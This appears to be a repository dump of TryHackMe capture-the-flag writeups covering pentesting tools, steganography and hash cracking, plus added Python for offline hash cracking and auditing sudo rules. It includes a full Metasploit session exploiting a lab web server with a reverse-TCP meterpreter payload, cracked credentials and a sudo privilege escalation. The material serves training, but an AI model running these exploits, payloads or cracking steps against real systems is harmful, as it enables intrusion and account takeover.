● d48a2f790f7294a4ecbac10b99a1a4271cdc67fff7246a314297f2bca2aaa71f : `Commonly used in Blockchain`

● a34e50c78f67d3ec5d0479cde1406c6f82ff6cd0 : `The OG`

### [Task 3] Spectrograms

A spectrogram is a visual representation of the spectrum of frequencies of a signal as it varies with time. When applied to an audio signal, spectrograms are sometimes called sonographs, voiceprints, or voicegrams. When the data is represented in a 3D plot they may be called waterfalls.

● Download the file : `Super Secret Message`

### [Task 4] Steganography

Steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video.

● Decode the image to reveal the answer. : `SpaghettiSteg`

### [Task 5] Security through obscurity

Security through obscurity is the reliance in security engineering on the secrecy of the design or implementation as the main method of providing security for a system or component of a system.

● Download and get 'inside' the file. What is the first filename & extension? : `hackerchat.png`

● Get inside the archive and inspect the file carefully. Find the hidden text.
: `"AHH_YOU_FOUND_ME!"`

--------------------------------------------------------------------------------
/C4ptur3 Th3 Fl4g/secretaudio.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/C4ptur3 Th3 Fl4g/secretaudio.wav

--------------------------------------------------------------------------------
/C4ptur3 Th3 Fl4g/stegosteg.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/C4ptur3 Th3 Fl4g/stegosteg.jpg

--------------------------------------------------------------------------------
/CC-Pentesting/README.md:
--------------------------------------------------------------------------------
# CC: Pen Testing | https://tryhackme.com/room/ccpentesting

### [Task 2] [Section 1 - Network Utilities] - nmap

#1 What does nmap stand for? : ```Network Mapper```

#2 How do you specify which port(s) to scan? : ```-p```

#3 How do you do a "ping scan" (just tests if the host(s) is up)? : ```-sn```

#4 What is the flag for a UDP scan? : ```-sU```

#5 How do you run default scripts? : ```-sC```

#6 How do you enable "aggressive mode" (enables OS detection, version detection, script scanning, and traceroute)? : ```-A```

#7 What flag enables OS detection? : ```-O```

#8 How do you get the versions of services running on the target machine? : ```-sV```

#9 Deploy the machine : ```No answer needed```

#10 How many ports are open on the machine? : ```1```

#11 What service is running on the machine? : ```Apache```

#12 What is the version of the service?
: ```2.4.18```

#13 What is the output of the http-title script (included in default scripts)? : ```Apache2 Ubuntu Default Page: It Works```

### [Task 3] [Section 1 - Network Utilities] - Netcat

#1 How do you listen for connections? : ```-l```

#2 How do you enable verbose mode (allows you to see who connected to you)? : ```-v```

#3 How do you specify a port to listen on? : ```-p```

#4 How do you specify which program to execute after you connect to a host (one of the most infamous)? : ```-e```

#5 How do you connect to UDP ports? : ```-u```

### [Task 4] [Section 2 - Web Enumeration] - gobuster

#1 How do you specify directory/file brute forcing mode? : ```dir```

#2 How do you specify DNS bruteforcing mode? : ```dns```

#3 What flag sets extensions to be used? Example: if the php extension is set, and the word is "admin", then gobuster will test admin.php against the webserver. : ```-x```

#4 What flag sets a wordlist to be used? : ```-w```

#5 How do you set the username for basic authentication (if the directory requires a username/password)? : ```-U```

#6 How do you set the password for basic authentication? : ```-P```

#7 How do you set which status codes gobuster will interpret as valid? : ```-s```

#8 How do you skip SSL certificate verification? : ```-k```

#9 How do you specify a User-Agent? : ```-a```

#10 How do you specify a HTTP header? : ```-H```

#11 What flag sets the URL to bruteforce? : ```-u```

#13 What is the name of the hidden directory? : ```secret```

#14 What is the name of the hidden file with the extension xxa? : ```password```

### [Task 5] [Section 2 - Web Enumeration] - nikto

#1 How do you specify which host to use? : ```-h```

#2 What flag disables SSL? : ```-nossl```

#3 How do you force SSL? : ```-ssl```

#4 How do you specify authentication (username + pass)? : ```-id```

#5 How do you select which plugin to use? : ```-plugins```

#6 Which plugin checks if you can enumerate apache users? : ```apacheusers```

#7 How do you update the plugin list? : ```-update```

#8 How do you list all possible plugins to use? : ```--list-plugins```

### [Task 7] [Section 3 - Metasploit]: Setting Up

#1 What command allows you to search modules? : ```search```

#2 How do you select a module? : ```use```

#3 How do you display information about a specific module? : ```info```

#4 How do you list options that you can set? : ```options```

#5 What command lets you view advanced options for a specific module? : ```advanced```

#6 How do you show options in a specific category? : ```show```

### [Task 8] [Section 3 - Metasploit]: Selecting a module

#1 How do you select the eternalblue module? : ```use exploit/windows/smb/ms17_010_eternalblue```

#2 What option allows you to select the target host(s)? : ```RHOSTS```

#3 How do you set the target port? : ```RPORT```

#4 What command allows you to set options? : ```set```

#5 How would you set SMBPass to "username"? : ```set SMBPass username```

#6 How would you set the SMBUser to "password"? : ```set SMBUser password```

#7 What option sets the architecture to be exploited? : ```arch```

#8 What option sets the payload to be sent to the target machine? : ```payload```

#9 Once you've finished setting all the required options, how do you run the exploit? : ```exploit```

#10 What flag do you set if you want the exploit to run in the background? : ```-j```

#11 How do you list all current sessions? : ```sessions```

#12 What flag allows you to go into interactive mode with a session ("drops you either into a meterpreter or regular shell")? : ```-i```

### [Task 9] [Section 3 - Metasploit]: meterpreter

#1 What command allows you to download files from the machine? : ```download```

#2 What command allows you to upload files to the machine? : ```upload```

#3 How do you list all running processes? : ```ps```

#4 How do you change processes on the victim host (ideally it will allow you to change users and gain the perms associated with that user)? : ```migrate```

#5 What command lists files in the current directory on the remote machine? : ```ls```

#6 How do you execute a command on the remote host? : ```execute```

#7 What command starts an interactive shell on the remote host? : ```shell```

#8 How do you find files on the target host (similar function to the Linux command "find")? : ```search```

#9 How do you get the output of a file on the remote host? : ```cat```

#10 How do you put a meterpreter shell into "background mode" (allows you to run other msf modules while also keeping the meterpreter shell as a session)? : ```background```

### [Task 10] [Section 3 - Metasploit]: Final Walkthrough

#1 Select the module that needs to be exploited : ```use exploit/multi/http/nostromo_code_exec```

#2 What variable do you need to set to select the remote host? : ```rhosts```

#3 How do you set the port to 80? : ```set rport 80```

#4 How do you set the listening address (your machine)? : ```lhost```

#5 Exploit the machine! : ```No answer needed```

#6 What is the name of the secret directory in the /var/nostromo/htdocs directory? : ```s3cretd1r```

#7 What are the contents of the file inside of the directory? : ```Woohoo!```

### [Task 13] [Section 4 - Hash Cracking]: hashcat

https://hashcat.net/wiki/doku.php?id=example_hashes

#1 What flag sets the mode? : ```-m```

#2 What flag sets the "attack mode"? : ```-a```

#3 What is the attack mode number for Brute-force? : ```3```

#4 What is the mode number for SHA3-512? : ```17600```

#5 Crack this hash: 56ab24c15b72a457069c5ea42fcfc640 (Type: MD5) : ```happy```

#6 Crack this hash: 4bc9ae2b9236c2ad02d81491dcb51d5f (Type: MD4) : ```nootnoot```

### [Task 14] [Section 4 - Hash Cracking]: John The Ripper

Note: There are multiple variations of jtr out there. For this task the version that comes pre-installed on Kali will be used.

Note 2: All hashes can be cracked with rockyou.txt.

#1 What flag lets you specify which wordlist to use? : ```--wordlist```

#2 What flag lets you specify which hash format (e.g. MD5, SHA1, etc.) to use? : ```--format```

#3 How do you specify which rule to use? : ```--rules```

#4 Crack this hash: 5d41402abc4b2a76b9719d911017c592 (Type: MD5) : ```hello```

#5 Crack this hash: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 (Type: SHA1) : ```password```

### [Task 16] [Section 5 - SQL Injection]: sqlmap

#1 How do you specify which URL to check? : ```-u```

#2 What about which Google dork to use? : ```-g```

#3 How do you select (lol) which parameter to use? (Example: in the URL http://ex.com?test=1 the parameter would be test.) : ```-p```

#4 What flag sets which database is in the target host's backend? (Example: if the flag is set to mysql then sqlmap will only test mysql injections.) : ```--dbms```

#5 How do you select the level of depth sqlmap should use (higher = more accurate and more tests in general)? : ```--level```

#6 How do you dump the table entries of the database? : ```--dump```

#7 Which flag sets which db to enumerate? (Case sensitive) : ```-D```

#8 Which flag sets which table to enumerate? (Case sensitive) : ```-T```

#9 Which flag sets which column to enumerate? (Case sensitive) : ```-C```

#10 How do you ask sqlmap to try to get an interactive os-shell? : ```--os-shell```

#11 What flag dumps all data from every table? : ```--dump-all```

### [Task 18] [Section 5 - SQL Injection]: Vulnerable Web Application

#2 How many types of sqli is the site vulnerable to? : ```3```

#4 What is the name of the database? : ```tests```

#5 How many tables are in the database? : ```2```

#6 What is the value of the flag? : ```found_me```

### [Task 20] [Section 6 - Samba]: smbmap

#1 How do you set the username to authenticate with? : ```-u```

#2 What about the password? : ```-p```

#3 How do you set the host? : ```-H```

#4 What flag runs a command on the server (assuming you have permissions, that is)? : ```-x```

#5 How do you specify the share to enumerate? : ```-s```

#6 How do you set which domain to enumerate? : ```-d```

#7 What flag downloads a file? : ```--download```

#8 What about uploading one? : ```--upload```

#9 Given the username "admin", the password "password", and the IP "10.10.10.10", how would you run ipconfig on that machine? : ```smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"```

### [Task 21] [Section 6 - Samba]: smbclient

#1 How do you specify which domain (workgroup) to use when connecting to the host? : ```-w```

#2 How do you specify the IP address of the host? : ```-I```

#3 How do you run the command "ipconfig" on the target machine?
: ```-c "ipconfig"```

#4 How do you specify the username to authenticate with? : ```-U```

#5 How do you specify the password to authenticate with? : ```-P```

#6 What flag is set to tell smbclient to not use a password? : ```-N```

#7 While in the interactive prompt, how would you download the file test, assuming it was in the current directory? : ```get test```

#8 In the interactive prompt, how would you upload your /etc/hosts file? : ```put /etc/hosts```

### [Task 24] [Section 7 - Final Exam]: Good Luck :D

#1 What is the user.txt? : ```supernootnoot```

#2 What is the root.txt? : ```congratulations!!!!```

--------------------------------------------------------------------------------
/CC-Pentesting/Task 10 - Section 3 - Metasploit Final Walkthrough.txt:
--------------------------------------------------------------------------------
╭─root@kali ~/TryHackMe/Rooms/CC-Pentesting ‹master*›
╰─# msfconsole
[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***


.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.

       =[ metasploit v5.0.67-dev                          ]
+ -- --=[ 1957 exploits - 1093 auxiliary - 336 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 10.10.57.13
RHOSTS => 10.10.57.13
msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 80
RPORT => 80
msf5 exploit(multi/http/nostromo_code_exec) > check
[*] 10.10.57.13:80 - The target appears to be vulnerable.
msf5 exploit(multi/http/nostromo_code_exec) > set target 1
target => 1
msf5 exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST tun0
LHOST => tun0
msf5 exploit(multi/http/nostromo_code_exec) > show options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.57.13      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Automatic (Linux Dropper)

msf5 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 10.9.11.171:4444
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x86/meterpreter/reverse_tcp command stager
[*] Sending stage (985320 bytes) to 10.10.57.13
[*] Meterpreter session 1 opened (10.9.11.171:4444 -> 10.10.57.13:38766) at 2020-04-05 17:33:50 +0530
[*] Command Stager progress - 100.00% done (763/763 bytes)

meterpreter > sysinfo
Computer     : 10.10.57.13
OS           : Ubuntu 16.04 (Linux 4.4.0-142-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

meterpreter > cd /var/nostromo/htdocs/
meterpreter > ls
Listing: /var/nostromo/htdocs
=============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  564   fil   2019-12-06 09:36:36 +0530  index.html
100644/rw-r--r--  1827  fil   2019-12-06 09:36:36 +0530  nostromo.gif
40755/rwxr-xr-x   4096  dir   2019-12-06 09:38:09 +0530  s3cretd1r

meterpreter > cd s3cretd1r
meterpreter > ls
Listing: /var/nostromo/htdocs/s3cretd1r
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  8     fil   2019-12-06 09:38:09 +0530  nice

meterpreter > cat nice
Woohoo!

meterpreter > exit

msf5 exploit(multi/http/nostromo_code_exec) > exit -y

--------------------------------------------------------------------------------
/CC-Pentesting/exam/gobuster.txt:
--------------------------------------------------------------------------------
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)

--------------------------------------------------------------------------------
/CC-Pentesting/exam/gobuster_secret.txt:
--------------------------------------------------------------------------------
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/index.html (Status: 200)
/secret.txt (Status: 200)

--------------------------------------------------------------------------------
/CC-Pentesting/exam/hash.txt:
--------------------------------------------------------------------------------
Hash : 046385855FC9580393853D8E81F240B66FE9A7B8

Type : sha1

Result : nyan

--------------------------------------------------------------------------------
/CC-Pentesting/exam/nmap.txt:
--------------------------------------------------------------------------------
nmap -A 10.10.162.177
Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-04-05 20:01 IST
Nmap scan report for 10.10.162.177
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 12:96:a6:1e:81:73:ae:17:4c:e1:7c:63:78:3c:71:1c (RSA)
|   256 6d:9c:f2:07:11:d2:aa:19:99:90:bb:ec:6b:a1:53:77 (ECDSA)
|_  256 0e:a5:fa:ce:f2:ad:e6:fa:99:f3:92:5f:87:bb:ba:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
[OS fingerprint lines omitted]

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   194.70 ms 10.9.0.1
2   195.12 ms 10.10.162.177

--------------------------------------------------------------------------------
/CC-Pentesting/exam/secret.txt:
--------------------------------------------------------------------------------
# Path : http://10.10.162.177/secret/secret.txt

nyan:046385855FC9580393853D8E81F240B66FE9A7B8
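The secret.txt line above pairs a username with a bare hex digest, and exam/hash.txt records it as SHA-1 cracking to nyan; the John The Ripper task earlier in the README lists two more (an MD5 of hello and a SHA-1 of password). As an added example that is not part of this repo, the Python below does by hand what hashcat and john do for these: guess candidate algorithms from the digest length, then test a wordlist with hashlib. The wordlist and the `identify`, `crack` and `parse_secret_line` names are constructed for the example.

```python
"""Identify a hash by its length and try to crack it against a wordlist.

Added example, not part of the thehackingsage/tryhackme repo. Pure hashlib,
so it runs offline; in practice the wordlist would be rockyou.txt.
"""
import hashlib
import re

# Candidate algorithms by hex-digest length. 32 hex digits is ambiguous
# (MD5, MD4 and NTLM are all 128-bit), which is why a length check narrows
# the field but does not settle it: each candidate has to be tried.
CANDIDATES = {
    32: ("md5", "md4", "ntlm"),
    40: ("sha1",),
    64: ("sha256",),
    128: ("sha512",),
}

# Small wordlist constructed for this example.
WORDLIST = ["123456", "hello", "password", "nyan", "happy", "nootnoot", "letmein"]


def digest(algo: str, word: str) -> str:
    """Hex digest of `word` under `algo`; NTLM is MD4 over the UTF-16LE encoding."""
    if algo == "ntlm":
        return hashlib.new("md4", word.encode("utf-16le")).hexdigest()
    return hashlib.new(algo, word.encode()).hexdigest()


def identify(h: str) -> tuple:
    """Return the candidate algorithms for a hex digest, or () if it is not plain hex."""
    h = h.strip().lower()
    if not re.fullmatch(r"[0-9a-f]+", h):
        return ()
    return CANDIDATES.get(len(h), ())


def crack(h: str, wordlist=WORDLIST):
    """Return (algo, word) for the first wordlist entry whose digest matches, else None."""
    target = h.strip().lower()          # secret.txt stored its SHA-1 in upper case
    for algo in identify(target):
        try:
            for word in wordlist:
                if digest(algo, word) == target:
                    return algo, word
        except ValueError:              # e.g. md4 disabled in this OpenSSL build
            continue
    return None


def parse_secret_line(line: str):
    """Split a `user:hash` line of the shape found in exam/secret.txt."""
    user, _, h = line.strip().partition(":")
    return user, h


if __name__ == "__main__":
    # Constructed in the same shape as the /secret/secret.txt line above.
    user, h = parse_secret_line("nyan:046385855FC9580393853D8E81F240B66FE9A7B8")
    print(user, identify(h), crack(h))
```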
--------------------------------------------------------------------------------
/CC-Pentesting/exam/ssh.txt:
--------------------------------------------------------------------------------
ssh nyan@10.10.162.177
The authenticity of host '10.10.162.177 (10.10.162.177)' can't be established.
ECDSA key fingerprint is SHA256:haqegvkQqmIEEzS0Mcd+NUsONboBQ6z3wQSwq+aj5Es.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.162.177' (ECDSA) to the list of known hosts.
nyan@10.10.162.177's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Sat Dec 21 08:37:54 2019
nyan@ubuntu:~$ ls
user.txt
nyan@ubuntu:~$ cat user.txt
supernootnoot
nyan@ubuntu:~$ sudo -l
Matching Defaults entries for nyan on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nyan may run the following commands on ubuntu:
    (root) NOPASSWD: /bin/su
nyan@ubuntu:~$ sudo su
root@ubuntu:/home/nyan# cd ~
root@ubuntu:~# ls
root.txt
root@ubuntu:~# cat root.txt
congratulations!!!!
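The `sudo -l` output above is the whole privilege escalation: a single `(root) NOPASSWD: /bin/su` rule hands nyan a root shell without a password. Added example, not from this repo: a small audit that parses `sudo -l` output in that format and flags rules granting `ALL` or a shell-like binary, so a defender can spot the misconfiguration before someone else does. The sample output and the `parse_sudo_l`/`audit` names are constructed here to match the session shown.

```python
"""Flag root-equivalent rules in `sudo -l` output.

Added example, not part of the thehackingsage/tryhackme repo. It reads the
text `sudo -l` prints (as captured in exam/ssh.txt) rather than /etc/sudoers,
so it can be run by the unprivileged user whose rules are being checked.
"""
import re

# Binaries that give the caller a shell or let them become another user;
# allowing them under sudo is equivalent to granting root outright.
SHELL_LIKE = {"/bin/su", "/usr/bin/su", "/bin/sh", "/bin/bash", "/bin/dash",
              "/usr/bin/env", "/usr/bin/sudo"}

# "    (root) NOPASSWD: /bin/su"  ->  runas="root", tags="NOPASSWD: ", cmds="/bin/su"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output: str) -> list:
    """Return [(runas, [tags], [commands])] for every rule line after the 'may run' header."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True                # Defaults lines above this are not rules
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in re.findall(r"[A-Z]+:", m.group("tags"))]
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        rules.append((m.group("runas"), tags, cmds))
    return rules


def audit(output: str) -> list:
    """Return one finding string per rule that is effectively a root shell."""
    findings = []
    for runas, tags, cmds in parse_sudo_l(output):
        for cmd in cmds:
            binary = cmd.split()[0]
            if cmd == "ALL" or binary in SHELL_LIKE:
                gate = "NOPASSWD" if "NOPASSWD" in tags else "password-gated"
                findings.append(f"{runas}: {cmd} [{gate}] is root-equivalent")
    return findings


# Constructed sample in the exact layout `sudo -l` printed on the exam box.
SAMPLE = """\
Matching Defaults entries for nyan on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User nyan may run the following commands on ubuntu:
    (root) NOPASSWD: /bin/su
    (root) /usr/bin/apt-get update
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```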
29 | -------------------------------------------------------------------------------- /CC-Pentesting/gobuster_10.10.56.144: -------------------------------------------------------------------------------- 1 | /.hta (Status: 403) 2 | /.htaccess (Status: 403) 3 | /.htpasswd (Status: 403) 4 | /index.html (Status: 200) 5 | /secret (Status: 301) 6 | /server-status (Status: 403) 7 | -------------------------------------------------------------------------------- /CC-Pentesting/gobuster_xxa_10.10.56.144: -------------------------------------------------------------------------------- 1 | /.htpasswd (Status: 403) 2 | /.htpasswd.xxa (Status: 403) 3 | /.htaccess (Status: 403) 4 | /.htaccess.xxa (Status: 403) 5 | /password.xxa (Status: 200) 6 | -------------------------------------------------------------------------------- /CC-Pentesting/nmap_10.10.253.33.txt: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Sun Apr 5 12:15:16 2020 as: nmap -sCSV -A -O -oN nmap_10.10.253.33.txt 10.10.253.33 2 | Nmap scan report for 10.10.253.33 3 | Host is up (0.85s latency). 4 | Not shown: 999 closed ports 5 | PORT STATE SERVICE VERSION 6 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 7 | |_http-server-header: Apache/2.4.18 (Ubuntu) 8 | |_http-title: Apache2 Ubuntu Default Page: It works 9 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/5%OT=80%CT=1%CU=31758%PV=Y%DS=2%DC=T%G=Y%TM=5E897ECC
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=104%TI=Z%CI=I%II=I%TS=8)SEQ(
OS:SP=107%GCD=1%ISR=104%TI=Z%II=I%TS=8)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O3
OS:=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST11NW6%O6=M54DST11)WIN(W1=68DF%W2=6
OS:8DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M54DNNSNW
OS:6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   433.82 ms 10.9.0.1
2   434.82 ms 10.10.253.33

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 5 12:16:36 2020 -- 1 IP address (1 host up) scanned in 79.76 seconds
--------------------------------------------------------------------------------
/CC-Steganography/README.md:
--------------------------------------------------------------------------------
# CC Steganography | https://tryhackme.com/room/ccstego

### [Task 2] Steghide

Steghide is one of the most famous steganography tools, and for good reason. It's a classic method, hiding a message inside an image, and steghide does it effectively and efficiently. A downside of steghide is that it only works on JPEGs; however, that means that if you believe there is a hidden message inside a JPEG, steghide is a probable option.

One of the greatest benefits of steghide is that it can encrypt the embedded data with a passphrase, meaning that anyone without the passphrase cannot extract the data.

steghide can be installed with the command ```sudo apt install steghide```

#1 What argument allows you to embed data (such as files) into other files? : ```embed```

#2 What flag lets you set the file to embed? : ```-ef```

#3 What flag allows you to set the "cover file" (i.e. the jpg)? : ```-cf```

#4 How do you set the password to use for the cover file? : ```-p```

#5 What argument allows you to extract data from files? : ```extract```

#6 How do you select the file that you want to extract data from? : ```-sf```

#7 Given the passphrase "password123", what is the hidden message in the included "jpeg1" file? : ```pinguftw```

### [Task 3] zsteg

zsteg is to PNGs what steghide is to JPEGs. It supports various techniques to extract any and all data from PNG files.

Note: zsteg also supports BMP files, but it is primarily used for PNGs.

zsteg can be installed by using ruby with the command ```gem install zsteg```

#1 How do you specify that the least significant bit comes first? : ```--lsb```

#2 What about the most significant bit? : ```--msb```

#3 How do you specify verbose mode? : ```-v```

#4 How do you extract the data from a specific payload? : ```-E```

#5 In the included file "png1" what is the hidden message? : ```nootnoot$```

#6 What about the payload used to encrypt it? : ```b1,bgr,lsb,xy```

### [Task 4] Exiftool

Exiftool is a tool that allows you to view and edit image metadata. While this in itself is not a stego tool, I would be remiss not to include at least a footnote on it, as one of the most popular forms of image stego is to hide messages in the metadata.

Exiftool can be installed with ```sudo apt install exiftool```

#1 In the included jpeg3 file, what is the document name? : ```Hello :)```

### [Task 5] Stegoveritas

Personally this is one of my favorite image stego tools. It supports just about every image file format and is able to extract all types of data from it. It is an incredibly useful tool if you don't know exactly what you're looking for, as it has a myriad of built-in tests to extract any and all data.

Note: Stegoveritas has other features as well, such as color correcting images.

Stegoveritas can be installed by running these two commands:

```pip3 install stegoveritas```

```stegoveritas_install_deps```

#1 How do you check the file for metadata? : ```-meta```

#2 How do you check for steghide hidden information? : ```-steghide```

#3 What flag allows you to extract LSB data from the image? : ```-extractLSB```

#4 In the included image jpeg2 what is the hidden message? : ```kekekekek```

### [Task 6] Spectrograms

Spectrogram steganography is the art of hiding an image inside an audio file's spectrogram. Therefore, whenever dealing with audio stego it is always worth analyzing the spectrogram of the audio. To do this task we will be using [Sonic Visualizer](https://www.sonicvisualiser.org/download.html).

Note: This introduction will be done using the included wav1 file.

When you open Sonic Visualizer you should see this screen:

From there click File->Open and then select the included wav1 file and you should see a screen similar to this:

From there click Layer->Add Spectrogram and you should see this:

And that's it!

#1 What is the hidden text in the included wav2 file? : ```Google```

### [Task 7] The Final Exam

Good luck and have fun!

#1 What is key 1? : ```superkeykey```

#2 What is key 2? : ```fatality```

#3 What is key 3? : ```killshot```
--------------------------------------------------------------------------------
/CC-Steganography/Tools/exiftool.txt:
--------------------------------------------------------------------------------
sudo apt install exiftool
--------------------------------------------------------------------------------
/CC-Steganography/Tools/sonic visualiser.txt:
--------------------------------------------------------------------------------
https://www.sonicvisualiser.org/download.html
--------------------------------------------------------------------------------
/CC-Steganography/Tools/steghide.txt:
--------------------------------------------------------------------------------
sudo apt install steghide
--------------------------------------------------------------------------------
/CC-Steganography/Tools/stegoveritas.txt:
--------------------------------------------------------------------------------
pip3 install stegoveritas && stegoveritas_install_deps
--------------------------------------------------------------------------------
/CC-Steganography/Tools/zsteg.txt:
--------------------------------------------------------------------------------
gem install zsteg
--------------------------------------------------------------------------------
/CC-Steganography/spect/KTrtNI5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/KTrtNI5.png
--------------------------------------------------------------------------------
/CC-Steganography/spect/exam1.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/exam1.jpeg
--------------------------------------------------------------------------------
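The zsteg task above reports its finding as the payload label `b1,bgr,lsb,xy`. The following is an added example, not code from the writeup or from zsteg: it builds a small RGB image in memory, embeds a NUL-terminated message in the lowest bit of each channel the way a 1-bit LSB tool would, and decodes it back using a label of that form. The reading of the four label fields (bits per channel, channel order, bit-packing direction, pixel walk) is this example's own and should be treated as an assumption when compared against zsteg's exact semantics; the cover pixels and the message are constructed for the demo.

```python
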